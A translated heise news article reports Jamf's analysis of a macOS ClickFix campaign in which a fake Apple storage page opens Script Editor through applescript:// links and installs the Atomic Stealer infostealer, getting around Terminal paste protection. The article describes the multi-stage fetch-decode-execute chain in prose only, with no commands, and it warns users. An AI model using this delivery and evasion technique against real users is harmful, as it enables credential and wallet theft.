"ClickFix" attacks on macOS now also via Script Editor
An ongoing malware campaign is using Apple's Script Editor instead of the Terminal to inject the Atomic Stealer data thief onto Macs.
Website impersonating Apple: No, you can't free up space on your Mac like this.
(Image: Jamf)
Security researchers from MDM specialist Jamf have discovered a new variant of the so-called ClickFix attack technique, which tricks users into executing commands on their Mac that then install malware. The new distribution method of the well-known data thief Atomic Stealer appears to be optimized to bypass a new protection in macOS Terminal that Apple introduced with macOS 26.4. This is intended to prevent problematic code from being executed so easily.
As Jamf Threat Labs writes in an analysis, attackers lure their victims to a fake Apple website that pretends to help free up storage space on the Mac. An “Execute” button on the page then calls the applescript:// URL scheme. The browser then asks the user for permission to open Script Editor – an action the victim might confirm without suspicion.
From URL Scheme to Data Thief
What's actually new about the method is the use of the applescript:// URL scheme: When called, Script Editor starts with a malicious AppleScript provided by the website. After execution by the user, this script executes an obfuscated command chain. First, a payload is loaded from an external server using the curl command, which, after decoding, is then passed to zsh. A second stage decodes further code via Base64 and gunzip, which finally downloads the actual malware – a Mach-O binary of Atomic Stealer – to /tmp, removes extended attributes for execution protection, and makes the file executable.
Videos by heise
What's interesting is that the installation chain bypasses macOS 26.4's Terminal paste protection. Apple introduced this protection feature to warn users about ClickFix attacks when they paste manipulated commands into the Terminal, although this doesn't always work. By switching to Script Editor, this mechanism is apparently circumvented, according to Jamf. However, to activate the malware, the user must still click the play button in Script Editor. This is communicated on the impersonated Apple page.
What Atomic Stealer Steals
Atomic Stealer is an infostealer that has been active since 2023 and is marketed to criminals, among other channels, via Telegram. The malware steals, among other things, keychain passwords, browser data such as autofill entries, cookies, and credit card numbers, as well as crypto wallets. Files from the Desktop and Documents folder can also be exfiltrated.
The use of Script Editor for malware distribution is not actually new, but distribution via applescript:// links is. Users should absolutely not confirm opening Script Editor via a website. Apple has not yet responded to the new method. It should be relatively easy to prevent.
Empfohlener redaktioneller Inhalt
Mit Ihrer Zustimmung wird hier ein externer Preisvergleich (heise Preisvergleich) geladen.
Ich bin damit einverstanden, dass mir externe Inhalte angezeigt werden. Damit können personenbezogene Daten an Drittplattformen (heise Preisvergleich) übermittelt werden. Mehr dazu in unserer Datenschutzerklärung.
(bsc)
